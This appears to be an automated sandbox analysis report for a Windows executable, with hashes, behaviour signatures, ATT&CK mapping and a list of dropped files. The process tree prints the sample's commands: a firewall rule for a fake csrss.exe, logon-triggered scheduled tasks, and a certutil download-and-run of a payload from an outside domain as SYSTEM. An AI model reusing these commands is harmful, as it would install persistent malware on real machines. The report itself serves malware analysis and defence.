5490b6a9acf728581c0ed54fc1e73b6b512eacbe2897c65e11918a27e5181e01

Analysis

max time kernel
80s
max time network
204s
platform
windows7_x64
resource
win7-20220414-en
submitted
24-05-2022 01:22

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

5490b6a9acf728581c0ed54fc1e73b6b512eacbe2897c65e11918a27e5181e01.exe
Size

3.8MB
MD5

2398437ccc44c1423def15077c7e0b87
SHA1

f6d5d7c86644c30dde8321b73e1714fb1896efe1
SHA256

5490b6a9acf728581c0ed54fc1e73b6b512eacbe2897c65e11918a27e5181e01
SHA512

4982c3e50834aa01a1c80142cc70aa254e9323dfea01c8d140d7ada43d4e3b04dedded5fdb9e9a0c125a08210267d216cd7c48c26e5f1329c0afe24ea9ec698f

Score

8^/10

evasion

Malware Config

Signatures

Modifies Windows Firewall 1 TTPs
evasion

Modify Existing Service
T1031
Modifies boot configuration data using bcdedit 1 IoCs

Processes:

bcdedit.exe

pid process

2004 bcdedit.exe
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exe

pid process

1956 schtasks.exe
1356 schtasks.exe

pid	process
2004	bcdedit.exe

pid	process
1956	schtasks.exe
1356	schtasks.exe

Modifies data under HKEY_USERS 17 IoCs

Processes:

netsh.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\tsgqec.dll,-102 = "1.0"	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\tsgqec.dll,-103 = "Microsoft Corporation"	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\eapqec.dll,-102 = "1.0"	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\dhcpqec.dll,-100 = "DHCP Quarantine Enforcement Client"	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\dhcpqec.dll,-103 = "1.0"	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\napipsec.dll,-1 = "IPsec Relying Party"	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\tsgqec.dll,-100 = "RD Gateway Quarantine Enforcement Client"	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\eapqec.dll,-100 = "EAP Quarantine Enforcement Client"	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\eapqec.dll,-101 = "Provides Network Access Protection enforcement for EAP authenticated network connections, such as those used with 802.1X and VPN technologies."	netsh.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\napipsec.dll,-3 = "Microsoft Corporation"	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\dhcpqec.dll,-101 = "Provides DHCP based enforcement for NAP"	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\dhcpqec.dll,-102 = "Microsoft Corporation"	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\napipsec.dll,-2 = "Provides IPsec based enforcement for Network Access Protection"	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\napipsec.dll,-4 = "1.0"	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\tsgqec.dll,-101 = "Provides RD Gateway enforcement for NAP"	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\eapqec.dll,-103 = "Microsoft Corporation"	netsh.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

Processes:

5490b6a9acf728581c0ed54fc1e73b6b512eacbe2897c65e11918a27e5181e01.exe5490b6a9acf728581c0ed54fc1e73b6b512eacbe2897c65e11918a27e5181e01.exe

pid	process
2012	5490b6a9acf728581c0ed54fc1e73b6b512eacbe2897c65e11918a27e5181e01.exe
1172	5490b6a9acf728581c0ed54fc1e73b6b512eacbe2897c65e11918a27e5181e01.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

Processes:

5490b6a9acf728581c0ed54fc1e73b6b512eacbe2897c65e11918a27e5181e01.exe

description	pid	process
Token: SeDebugPrivilege	2012	5490b6a9acf728581c0ed54fc1e73b6b512eacbe2897c65e11918a27e5181e01.exe
Token: SeImpersonatePrivilege	2012	5490b6a9acf728581c0ed54fc1e73b6b512eacbe2897c65e11918a27e5181e01.exe

Suspicious use of WriteProcessMemory 7 IoCs

Processes:

5490b6a9acf728581c0ed54fc1e73b6b512eacbe2897c65e11918a27e5181e01.execmd.exe

description	pid	process	target process
PID 1172 wrote to memory of 1496	1172	5490b6a9acf728581c0ed54fc1e73b6b512eacbe2897c65e11918a27e5181e01.exe	cmd.exe
PID 1172 wrote to memory of 1496	1172	5490b6a9acf728581c0ed54fc1e73b6b512eacbe2897c65e11918a27e5181e01.exe	cmd.exe
PID 1172 wrote to memory of 1496	1172	5490b6a9acf728581c0ed54fc1e73b6b512eacbe2897c65e11918a27e5181e01.exe	cmd.exe
PID 1172 wrote to memory of 1496	1172	5490b6a9acf728581c0ed54fc1e73b6b512eacbe2897c65e11918a27e5181e01.exe	cmd.exe
PID 1496 wrote to memory of 1140	1496	cmd.exe	netsh.exe
PID 1496 wrote to memory of 1140	1496	cmd.exe	netsh.exe
PID 1496 wrote to memory of 1140	1496	cmd.exe	netsh.exe

C:\Users\Admin\AppData\Local\Temp\5490b6a9acf728581c0ed54fc1e73b6b512eacbe2897c65e11918a27e5181e01.exe
"C:\Users\Admin\AppData\Local\Temp\5490b6a9acf728581c0ed54fc1e73b6b512eacbe2897c65e11918a27e5181e01.exe"
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2012

C:\Users\Admin\AppData\Local\Temp\5490b6a9acf728581c0ed54fc1e73b6b512eacbe2897c65e11918a27e5181e01.exe
"C:\Users\Admin\AppData\Local\Temp\5490b6a9acf728581c0ed54fc1e73b6b512eacbe2897c65e11918a27e5181e01.exe"
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1172

C:\Windows\system32\cmd.exe
C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
3⤵
- Suspicious use of WriteProcessMemory
PID:1496

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
4⤵
- Modifies data under HKEY_USERS
PID:1140

C:\Windows\rss\csrss.exe
C:\Windows\rss\csrss.exe ""
3⤵
PID:1204

C:\Windows\system32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
4⤵
- Creates scheduled task(s)
PID:1956

C:\Windows\system32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR "cmd.exe /C certutil.exe -urlcache -split -f https://gfixprice.space/app/app.exe C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe /31340" /TN ScheduledUpdate /F
4⤵
- Creates scheduled task(s)
PID:1356

C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
"C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"
4⤵
PID:1912

C:\Windows\system32\bcdedit.exe
C:\Windows\Sysnative\bcdedit.exe /v
4⤵
- Modifies boot configuration data using bcdedit
PID:2004

C:\Windows\system32\makecab.exe
"C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20220524032326.log C:\Windows\Logs\CBS\CbsPersist_20220524032326.cab
1⤵
PID:1232

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Modify Existing Service

T1031

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Credential Access

Discovery

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
Filesize
795KB

MD5
57886526408d918d2504af120438e2d3

SHA1
4f0bee6f65304ccbd6a02e496b3a8dda21f92113

SHA256
ae5d22b49be7d31cfa2118f1ce758fcaa9bbaf47c7332345c3ee5f104bdb5be7

SHA512
b305d001e96dd25d148fc6a82dee19cdd2845e8360cc67bd2a21679e8e8d623b38f405fcfe62f973c77620be51d957b52fa40fb96823a165b6fb684041d701af

Download Submit
C:\Windows\rss\csrss.exe
Filesize
1.5MB

MD5
03ff8f3407b37a8738feb2a6d44023e0

SHA1
f013118644391424d27d370f34a3588b16cd442d

SHA256
743bda3d297a05158986d3b65d9434f89247e2430f226d0a2c2f7c8ead9f2f50

SHA512
432f2be7cd67e1b240eb01e382f65361ffa68d39aaaa37a76fa7af620e5a66beba61b88d510ed0b27a472efc75fbcf72f92b95b142849271adc15398e5bd0171

Download Submit
\Users\Admin\AppData\Local\Temp\csrss\patch.exe
Filesize
1007KB

MD5
fee1361b94fc5e9534a5f29dec8390d0

SHA1
0f31dc67981c847b04bd89f0203244321aaec84d

SHA256
09869a001cd8b2af88e67435090a7d4d67c8d8809c49e0d47345fc0a5d029cf5

SHA512
7df763320913891766151205f5298df15aea0256d7123f5909626404f8f24a922caaa200126a959e69e819fe1378d00d983d536efde59be091ac46094d6796fb

Download Submit
\Users\Admin\AppData\Local\Temp\csrss\patch.exe
Filesize
926KB

MD5
4c1afc296029cc07b0b671623a4646d5

SHA1
4327258826ceed3bb71175b9f3149fddb644786d

SHA256
46f58250810e5affaa86a45b9e70e2b91db2e6e10c013df38939046cb9b9e08c

SHA512
9b73ccfe1468acb7ca2d33832f2d09e29e71529af627417284f52e9f62078dfed384cb149810fa068b60837b15dfb6bc770ab887ccef97d104567d4f39971d99

Download Submit
\Users\Admin\AppData\Local\Temp\csrss\patch.exe
Filesize
999KB

MD5
f953111ce08297064a5a85e53680774e

SHA1
c51d7ef2f14aab027c39ed41e17be18197be8b80

SHA256
756fd97d974a0d084ad201029a141c05929e84dd2ca52b9ac75a3e10d7e1999b

SHA512
ea097e367c7e80afab0947c80772ee20a3d0959011877a41d1fca8bed29e933399c6a59d4154b4df98d4c073a79b89c2a84cfca032e078054587670afd58a69d

Download Submit
\Users\Admin\AppData\Local\Temp\dbghelp.dll
Filesize
902KB

MD5
003454e0ce154f7707b47bc8bd8ca901

SHA1
751b3e6a0be4e973a5e3750dcf260e2d3ff85258

SHA256
2cd4170a79fb58fba1c72bdb1cfa4ee79dbbc15284be14c28549b6e85f604df3

SHA512
b2091cfcdb795f84dddc938c44ea1dbe9fbe17a6275d37fdfd546fd0fae11bb3067470983c652c568d47bc4fb8d8f1920567f78ebcf7cba2439849bc61b00227

Download Submit
\Users\Admin\AppData\Local\Temp\ntkrnlmp.exe
Filesize
923KB

MD5
56ec65dca9e2cc458bd94d4d0a184d91

SHA1
1d2afff104337ee20e6244e81156b61e3dd6202c

SHA256
bd2a9e2d148a86580bc158b2c283c18153344b3d808cf1f17f75f11382ba450e

SHA512
18d447609b2771718b633f9ff5af75ef7e68c1a38229d172fc858129cd4ffae85b276deb7bbb1bbe5b1c86f4ee047d7e0555b6a7b4c53538ab8793905278b794

Download Submit
\Users\Admin\AppData\Local\Temp\ntkrnlmp.exe
Filesize
1.0MB

MD5
9d75bb89e415a6e0c5255dad7e395ee7

SHA1
747e50b4ddf79aa77a305440e2b9f6a2d9c001d0

SHA256
2c84a9d343a7f953c205c5906579e63fc02ca03ebec7d639802bef90114f27ea

SHA512
1a6e5fa21c7fb7bb5b349d6e52f8b8265a773b722f0a7e098aa1b472996004987e3fe677a6fde1c72a56400558347060676461a0d2ae47759015fa86d3e0d252

Download Submit
\Users\Admin\AppData\Local\Temp\ntkrnlmp.exe
Filesize
923KB

MD5
ad460861b380b9b79d6f31fe0b0c7135

SHA1
d0750cb286597e1864829f81433214434ab0d653

SHA256
f59ee6e28dc2a24769ef33f056d73b9a87f58861688e0b4753b9e17921bfe1f1

SHA512
990a1083b9e153ec274bbcf59ea07106d0a29399262a58062e6662488b0f552be30af1949df0574d3d6b29d0a731249110cc8ab3e05ffb4df47471310b0e476d

Download Submit
\Users\Admin\AppData\Local\Temp\osloader.exe
Filesize
568KB

MD5
d8f361a365a5add07a58e0a74b65ddbc

SHA1
32bbe3f2646e123bf32349537866e976884aced1

SHA256
8e6b2343e9f1156c93129def93326d2c4ad248f134722ec8179fbdac489313ef

SHA512
a08071e2a4ad2c2a87ee17df3cc693c921bfc14b76ba56e805be00e717ed7d019a2e7db4216c78fda2de299706b64020a28a1df28a783be42c968b0bf5e9bab3

Download Submit
\Users\Admin\AppData\Local\Temp\osloader.exe
Filesize
591KB

MD5
e2f68dc7fbd6e0bf031ca3809a739346

SHA1
9c35494898e65c8a62887f28e04c0359ab6f63f5

SHA256
b74cd24cef07f0226e7b777f7862943faee4cf288178b423d5344b0769dc15d4

SHA512
26256a12b5b8b3a40b34f18e081cdb45ea11845589c9d458a79385a4b8178f32164b417ddc9346fab8299bc6d4b9fedb620274c4edf9321424f37a2e2a6de579

Download Submit
\Users\Admin\AppData\Local\Temp\osloader.exe
Filesize
591KB

MD5
e2f68dc7fbd6e0bf031ca3809a739346

SHA1
9c35494898e65c8a62887f28e04c0359ab6f63f5

SHA256
b74cd24cef07f0226e7b777f7862943faee4cf288178b423d5344b0769dc15d4

SHA512
26256a12b5b8b3a40b34f18e081cdb45ea11845589c9d458a79385a4b8178f32164b417ddc9346fab8299bc6d4b9fedb620274c4edf9321424f37a2e2a6de579

Download Submit
\Users\Admin\AppData\Local\Temp\symsrv.dll
Filesize
163KB

MD5
5c399d34d8dc01741269ff1f1aca7554

SHA1
e0ceed500d3cef5558f3f55d33ba9c3a709e8f55

SHA256
e11e0f7804bfc485b19103a940be3d382f31c1378caca0c63076e27797d7553f

SHA512
8ff9d38b22d73c595cc417427b59f5ca8e1fb7b47a2fa6aef25322bf6e614d6b71339a752d779bd736b4c1057239100ac8cc62629fd5d6556785a69bcdc3d73d

Download Submit
\Windows\rss\csrss.exe
Filesize
1.2MB

MD5
790ad2db8365c5a6c221c296452e1b5a

SHA1
91617ef70e86fb44c8bf2fc56d4313fa08400767

SHA256
95f3527645db675b9632fefb2ad1f927021a9bbcada929eafefd1d98680f503c

SHA512
a7d1134f9f836b13400805c7a289b90c98581d68dce73263c6dbc58ee2a5a8e1ae0e13d9e1a3fa5b669ef0063104c0a8ba45fab6afde402cb7f7f3a7f9f43e44

Download Submit
\Windows\rss\csrss.exe
Filesize
1.4MB

MD5
e7c18e3437e3cc005c76f2758f4c546e

SHA1
2accb610956b34604afd06539a3ee0013859bb2a

SHA256
9d2389038371e308a10521366d5f2d97947ef9e1815db66f2d58e871767ed39a

SHA512
d8b270d58632899f1c34ec62a64cf8d9649865447aa4fa60888fef7997d10be2d06b4fbdd4a9d4b89c93939dc91332e790219a85525e7d0d0e7b0b80df7c1926

Download Submit
memory/1140-63-0x000007FEFB6A1000-0x000007FEFB6A3000-memory.dmp

Filesize
8KB

Download
memory/1140-62-0x0000000000000000-mapping.dmp

Download
memory/1172-60-0x0000000000400000-0x000000000313E000-memory.dmp

Filesize
45.2MB

Download
memory/1172-59-0x00000000036A0000-0x0000000003A46000-memory.dmp

Filesize
3.6MB

Download
memory/1172-58-0x00000000036A0000-0x0000000003A46000-memory.dmp

Filesize
3.6MB

Download
memory/1204-68-0x0000000003380000-0x0000000003726000-memory.dmp

Filesize
3.6MB

Download
memory/1204-70-0x0000000000400000-0x000000000313E000-memory.dmp

Filesize
45.2MB

Download
memory/1204-69-0x0000000003380000-0x0000000003726000-memory.dmp

Filesize
3.6MB

Download
memory/1204-66-0x0000000000000000-mapping.dmp

Download
memory/1496-61-0x0000000000000000-mapping.dmp

Download
memory/2004-84-0x0000000000000000-mapping.dmp

Download
memory/2012-54-0x0000000003400000-0x00000000037A6000-memory.dmp

Filesize
3.6MB

Download
memory/2012-57-0x0000000000400000-0x000000000313E000-memory.dmp

Filesize
45.2MB

Download
memory/2012-56-0x00000000037B0000-0x0000000003EA5000-memory.dmp

Filesize
7.0MB

Download
memory/2012-55-0x0000000003400000-0x00000000037A6000-memory.dmp

Filesize
3.6MB

Download